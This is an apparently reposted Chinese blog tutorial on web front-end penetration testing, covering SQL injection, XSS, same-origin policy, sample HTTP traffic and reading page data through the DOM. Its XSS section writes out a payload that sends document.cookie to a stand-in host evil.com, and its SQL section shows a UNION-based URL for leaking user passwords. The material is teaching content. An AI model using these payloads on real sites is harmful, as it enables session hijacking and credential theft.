zoukankan      html  css  js  c++  java
  • Web前端渗透测试技术小结(一)

    首先端正一下态度不可干违法的事

     1、SQL注入测试

        对于存在SQL注入的网页,使用SQL语句进行关联查询(仿照C/S模式)eg   http://www.foo.com/user.php?id=1

    常见的这样的网址,这样提交到服务器后返回的只能是ID=1的普通信息。做数据库关联查询http://www.foo.com/user.php?id=1 union where id=1 union select password ,1,a from users这样的SQL语句是合法的,如果拂去其端的应用存在SQL注入问题,他会认为这是合法的提交查询,当这样提交后user的password会发生泄漏。以及密码账户上也可以进行测试。

      2、XSS跨站脚本攻击

         这里先解释跨站脚本 eg <script>eval(location.hash.substr(1));</script>,这段代码会保存到http://www.foo.com/info/html中,JavaScript内置的函数eval可以动态的调用JavaScript语句,location.hash获取的是链接http://www.foo.com/info.html#callback中的#后面的内容,substr是字符创截取函数,location.hash.substr(1)表示截取#后面的内容给eval函数进行动态的执行。

        现在来构造XSS链接脚本语句,http://www.foo.com/info.html#new%20Image().src="http://evil.com/steal.php?c="+escape(document.cookie)浏览器执行后脚本会变成eval('new Image().src="http://www/evil.com/steal.php?c="escape(document.cookie)')这样就可以跨站获取cookie信息,利用cookie可以登录被攻击者的账号,进行越权操作。

      3、同源策略

       不同客户端脚本在没有授权的情况下不能读写对方的资源。

        所谓同域就是指 同协议,桐域名,桐端口,通常说的两个站点同域就是指他们同源。

        客户端脚本主要是指JavaScript和ActionScript(Flash脚本语言),以及两者遵循的ECMAScript脚本标准,Flash提供了通信接口,两个脚本之间可以互相的通信。这里在说明一下Ajax是后台异步传输数据的一种形式,不需要刷新网页便可以修改后台数据。

         所谓授权就是目标站明确返回HTTP响应头  Access-control-allow-origin: http://ww.evil.com那么ajax技术对www.foo.com上的数据进行读写操作。

        读写权限,web上资源针对不同用户使用不同的权限,HTTP请求的referer只可读,但是document.cookie具备读写。

        资源,这里只说跨护端的资源,包括HTTP消息头,整个DOM树,浏览器存储cookie 、Flash Cookie、localStorage。

      4、HTTP协议

         在抓包分析中常看到HTTP协议链接会立即断开或者延时断开,每次请求都是再次建立。

    GET http://www.foo.com/ HTTP/1.1

    Host: www.foo.com
    Connection: keep-alive
    Cache-Control: max-age=0
    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.19 (KHTML, like
    Gecko) Chrome/18.0.1025.3 Safari/535.19
    Referer: http://www.baidu.com/
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Encoding: gzip,deflate,sdch

    Accept-Language: zh-CN,zh;q=0.8
    Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
    Cookie: SESSIONID=58AB420B1D8B800526ACCCAA83A827A3:FG=1

    响应如下:
    HTTP/1.1 200 OK
    Date: Sun, 04 Mar 2012 22:48:31 GMT
    Server: Apache/2.2.8 (Win32) PHP/5.2.6
    Set-Cookie: PTOKEN=; expires=Mon, 01 Jan 1970 00:00:00 GMT; path=/;
    domain=.foo.com; HttpOnly
    Set-Cookie: USERID=c7888882e039b32fd7b4d3; expires=Tue, 01 Jan 2030
    00:00:00 GMT; path=/; domain=.foo.com
    X-Powered-By: PHP/5.2.6
    Content-Length: 3635
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: text/html;charset=gbk
    <html>

       4、iframe标签是HTML中的一个重要的标签,是web安全中出频率最高,很多网站通过这个标签嵌入第三方的内容,比如广告页面。

       5、隐私获取,通过JavaScript语句可以构造函数获取相应的值,document.getElementById('private_msg').innerHTML这表示获取标签对象内HTML数据内容,也可以借用DOM接受标签名做进一步查询,document.getElementByTagNmae('div)[2].innerHTML;使用函数 getElementsByTagName接受的就是标签名,返回一个数组。另外还可以通过这种 方法获取cookie值,document.cookie

    时到用时方恨少。。。。。。。。。

        

  • 相关阅读:
    docker下overlay2占用空间过大,清理docker占用空间
    js为浏览器URL追加参数
    img转Blob对象
    《ECharts》伪立体柱状图
    js分秒格式转时分秒
    表单边框缺一角效果
    File对象转base64
    《VUE》可编辑div限制字数
    quill富文本编辑器自定义字体、文字大小(编辑器内含element上传组件)
    我在华为工作十年的感悟(文摘)
  • 原文地址:https://www.cnblogs.com/xinxianquan/p/8336725.html
Copyright © 2011-2022 走看看